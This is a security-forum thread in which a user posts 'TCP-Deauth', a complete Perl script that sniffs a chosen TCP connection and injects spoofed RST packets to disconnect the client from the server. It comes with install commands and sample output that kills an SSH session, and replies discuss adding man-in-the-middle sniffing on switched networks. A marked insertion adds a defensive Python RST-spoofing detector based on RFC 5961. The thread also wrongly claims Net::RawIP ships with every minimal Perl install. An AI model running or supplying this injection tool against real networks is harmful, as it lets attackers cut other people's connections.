
Thread: TCP-Deauth v0.4

  1. #1
    azert0x (Just burned his ISO) - Join Date: May 2010, Posts: 4

    TCP-Deauth v0.4

    Hi. I wrote this small Perl script during my research on the TCP/IP protocol. It disconnects a host from a server; everything is in the usage.

    Code:
    #!/usr/bin/perl
    # TCP-Deauth v0.4: wait for one server->client segment of the chosen
    # connection, then answer it with a spoofed RST in each direction.
    use strict;
    use warnings;
    use Net::RawIP;

    print "[TCP-Deauth v0.4] Exploit by azert0x\n" . "=" x 36 . "\n";
    my ($eth, $cip, $sip, $sport) = @ARGV;
    # all four arguments are required
    die "Usage: $0 [interface] [client ip] [server ip] [server port]\n" if @ARGV < 4;

    my $n = Net::RawIP->new;
    print "Waiting for specified network traffic...\n";
    # capture a single segment sent by the server to the client on the given port
    my $p = $n->pcapinit($eth, "tcp and src host $sip and dst host $cip and dst port $sport", 1500, 30);
    loop($p, 1, \&tcprst, 0);
    print "> TCP-Deauth Exploit Done :)\n";

    sub tcprst {
      # $_[2] is the raw frame; skip the 14-byte Ethernet header
      $n->bset(substr($_[2], 14));
      my ($cport, $ack_seq, $seq) = $n->get({tcp => [qw(source ack_seq seq)]});
      # RST to the server, pretending to be the client
      $n->set({ip => {saddr => $cip, daddr => $sip}, tcp => {source => $cport, dest => $sport, ack_seq => $ack_seq, seq => $seq, rst => 1}});
      print "Sending Spoofed RST to $sip:$sport with Acknum $ack_seq and Seqnum $seq\n";
      $n->send;
      # RST to the client, pretending to be the server
      $n->set({ip => {saddr => $sip, daddr => $cip}, tcp => {source => $sport, dest => $cport, ack_seq => $ack_seq, seq => $seq, rst => 1}});
      print "Sending Spoofed RST to $cip:$cport with Acknum $ack_seq and Seqnum $seq\n";
      $n->send;
    }

    # azert0x first sploit.
    # Thanks to Perl Underground!

    On BackTrack 4 the CPAN Perl module Net::RawIP segfaults, so:

    $ sudo perl -MCPAN -e "install Net::RawIP"


    and after compilation and (re)installation it works great. Then run the script as is and you'll see the usage.

    $ sudo perl deauth.pl

    My script spies on the specified client and server network traffic, gets the values of the ack_seq & seq flags and sends to the server, with them, a network packet with the RST flag set (this RST packet masquerades as the client). If the connection is in ESTABLISHED state, my script re-sends another RST packet to the client (this RST packet masquerades as the server).

    You must obviously be able to sniff the traffic between the targets for my tool to work (you should have understood that from reading the above).

    It works in various network environments, not only in localhost!
    But if you work in localhost (127.0.0.1), specify "lo" as network interface.

    For example: I have a localhost SSH server and I'm connected to it. I run my Perl script and it waits for network traffic. When I press a key in my SSH shell, I'm disconnected.

    azert0x@bt4:~$ sudo perl deauth.pl lo 127.0.0.1 127.0.0.1 22
    [TCP-Deauth v0.4] Exploit by azert0x
    ============================
    Waiting for specified network traffic...
    Sending Spoofed RST to 127.0.0.1:22 with Acknum -131693645 and Seqnum -123819417...
    Sending Spoofed RST to 127.0.0.1:60295 with Acknum -131693645 and Seqnum -123819417...
    > TCP-Deauth Exploit Done :)

    I'll update it soon, so please, if you have any problems, bugs or ideas about it, tell me. I'll gladly work on improvements.
    Last edited by azert0x; 10-15-2010 at 02:29 PM.
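    The post above describes the tool as sniffing a server-to-client segment and reusing its sequence numbers in spoofed RSTs. Below is an added example, written for this page and not part of the thread or of azert0x's script: a passive monitor in Python that applies the RST acceptance rules of RFC 5961 (the mitigation later replies ask about) to each RST it sees and flags a TTL that differs from the rest of the flow. The addresses are the ones used in the thread and the client port is the one from the output above; the traffic, payload lengths, TTLs and the receive window are constructed for the example.

```python
"""Passive detector for spoofed TCP RST segments.

Added example, not the script from this thread. It keeps, per direction of a
flow, the sequence number the receiver expects next (RCV.NXT) and the IP TTL
first seen from that sender, then judges every RST the way an RFC 5961
receiver does: an exact RCV.NXT match resets, an in-window RST only triggers a
challenge ACK, anything else is dropped. A RST whose TTL differs from the
rest of the flow is flagged as an extra injection indicator.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

MOD = 1 << 32
ASSUMED_WINDOW = 65535  # assumption: receive window credited to each side


@dataclass
class Seg:
    src: str
    sport: int
    dst: str
    dport: int
    seq: int
    ack: int
    flags: str       # subset of "SFRPA"
    ttl: int
    length: int = 0  # payload bytes


def in_window(seq: int, rcv_nxt: int, wnd: int) -> bool:
    """True if seq lies in [rcv_nxt, rcv_nxt + wnd), modulo 2**32."""
    return (seq - rcv_nxt) % MOD < wnd


def rfc5961_rst_verdict(seq: int, rcv_nxt: int, wnd: int) -> str:
    """RFC 5961 section 3.2 RST handling for an established connection."""
    if seq == rcv_nxt:
        return "accept"          # exact match: connection is reset
    if in_window(seq, rcv_nxt, wnd):
        return "challenge-ack"   # in window but not exact: ask the peer to confirm
    return "drop"                # outside the window: silently discarded


class RstMonitor:
    def __init__(self, wnd: int = ASSUMED_WINDOW):
        self.wnd = wnd
        self.rcv_nxt: Dict[Tuple[str, str], int] = {}  # (sender, receiver) -> expected seq
        self.ttl: Dict[Tuple[str, str], int] = {}      # (sender, receiver) -> first TTL seen
        self.alerts: List[str] = []

    def observe(self, s: Seg) -> Optional[str]:
        key = (f"{s.src}:{s.sport}", f"{s.dst}:{s.dport}")
        if "R" not in s.flags:
            # Ordinary segment: SYN and FIN each consume one sequence number.
            consumed = s.length + ("S" in s.flags) + ("F" in s.flags)
            self.rcv_nxt[key] = (s.seq + consumed) % MOD
            self.ttl.setdefault(key, s.ttl)
            return None
        expected = self.rcv_nxt.get(key)
        # No state for this direction: a stack with no matching TCB ignores the RST.
        verdict = "drop" if expected is None else rfc5961_rst_verdict(s.seq, expected, self.wnd)
        if verdict != "accept":
            self.alerts.append(f"RST {verdict} {key[0]}->{key[1]}: seq {s.seq}, expected {expected}")
        base_ttl = self.ttl.get(key)
        if base_ttl is not None and base_ttl != s.ttl:
            self.alerts.append(f"TTL anomaly {key[0]}->{key[1]}: RST ttl {s.ttl}, flow ttl {base_ttl}")
        return verdict


CLIENT, SERVER = "192.168.1.2", "192.168.1.1"  # hosts from the thread's example


def run_sample() -> Tuple[List[Optional[str]], List[str]]:
    """Replay constructed traffic for one SSH connection; return verdicts and alerts."""
    m = RstMonitor()
    traffic = [
        # established flow, both hosts one hop away (TTL 64)
        Seg(CLIENT, 60295, SERVER, 22, seq=1000, ack=5000, flags="PA", ttl=64, length=10),
        Seg(SERVER, 22, CLIENT, 60295, seq=5000, ack=1010, flags="PA", ttl=64, length=20),
        # RST towards the server carrying the server's own sequence number:
        # in window, so a pre-5961 stack resets but a 5961 stack only challenges
        Seg(CLIENT, 60295, SERVER, 22, seq=5000, ack=1010, flags="R", ttl=64),
        # RST towards the client far outside the window: dropped either way
        Seg(SERVER, 22, CLIENT, 60295, seq=900000, ack=1010, flags="R", ttl=64),
        # RST towards the client that matches exactly but arrives with another TTL
        Seg(SERVER, 22, CLIENT, 60295, seq=5020, ack=1010, flags="R", ttl=57),
    ]
    return [m.observe(s) for s in traffic], m.alerts


if __name__ == "__main__":
    verdicts, alerts = run_sample()
    print(verdicts)
    print("\n".join(alerts))
```

    The third segment is the interesting one for this thread: a RST that reuses the peer's own sequence number lands inside the receive window, which RFC 793 stacks accept but RFC 5961 stacks answer with a challenge ACK instead of tearing the connection down. The TTL check is independent of sequence numbers and catches a RST injected from a host at a different distance than the real peer.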

  2. #2
    Gitsnik (Very good friend of the forum) - Join Date: Jan 2010, Location: The Crystal Wind, Posts: 851

    Re: TCP-Deauth v0.4

    One of my favourite links on the topic, may be useful to you in terms of where to go from here:

    Programming TCP Hijacking Tools in Perl

    I'd also like to see how you plan to break the TCP connection if, for example, you have server(192.168.1.1), client(192.168.1.2) and attacker(192.168.1.3), and perhaps some documentation on how/why this works, and possible workarounds for it.

    Other than that the script is cleanish and simple for anyone who wants to have a read through, with enough explanations on the datenterrorist link to get you through if you need the help.
    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.

  3. #3
    azert0x (Just burned his ISO) - Join Date: May 2010, Posts: 4

    Re: TCP-Deauth v0.4

    Thanks for the link, I didn't know it, and for your advice.

    Quote Originally Posted by Gitsnik:
    I'd also like to see how you plan to break the TCP connection if, for example, you have server(192.168.1.1), client(192.168.1.2) and attacker(192.168.1.3), and perhaps some documentation on how/why this works, and possible workarounds for it.
    My little Perl script works great in the environment that you have suggested: server(192.168.1.1), client(192.168.1.2) and attacker(192.168.1.3). Try it.

    I use Net::RawIP because it is sufficient. We need nothing more to do it. I agree with you, it's the bare minimum, but it does what I explain.

    If you want more information or documentation, see my website.
    Last edited by azert0x; 05-14-2010 at 04:00 PM. Reason: Merging...

  4. #4
    Junior Member - Join Date: Apr 2010, Location: Sweden, Posts: 35

    Re: TCP-Deauth v0.4

    From what I gather, you need to be able to sniff the traffic between the client/server in order to execute this exploit?

  5. #5
    azert0x (Just burned his ISO) - Join Date: May 2010, Posts: 4

    Re : TCP-Deauth v0.4

    Yes, that's why I only used Net::RawIP, which comes with every minimal Perl installation. This increases portability.
    Last edited by azert0x; 09-05-2010 at 01:33 PM.

  6. #6
    Gitsnik (Very good friend of the forum) - Join Date: Jan 2010, Location: The Crystal Wind, Posts: 851

    Re: Re : TCP-Deauth v0.4

    Quote Originally Posted by azert0x:
    Yes, that's why I only used the Net::RawIP CPAN module, which comes with every minimal Perl installation.
    And how do you expect to get all this traffic on a switched network with only the "tcp and src $sip and dst $cip etc." filter?

    That same filter should be applied to tcpdump to see if it works at picking up all network traffic - it does not unless I slap everything into a hub and run them from there (or MiTM the lot). This is switching-network-traffic-101. If it was as easy as firing up tcpdump we'd never have come up with the masses of MiTM tools we have.

  7. #7
    azert0x (Just burned his ISO) - Join Date: May 2010, Posts: 4

    Re : TCP-Deauth v0.4

    Quote Originally Posted by Gitsnik:
    And how do you expect to get all this traffic on a switched network with only the "tcp and src $sip and dst $cip etc." filter?
    It is up to you to do MITM attacks or "slap everything into a hub" before using TCP-Deauth. As I said: you must obviously be able to sniff the traffic between the targets for my tool to work...

    The pcap filter is correct and I tested it before using it (you can change it if it's not to your liking, but you'll have to adapt the script yourself).
    Last edited by azert0x; 09-05-2010 at 01:37 PM.
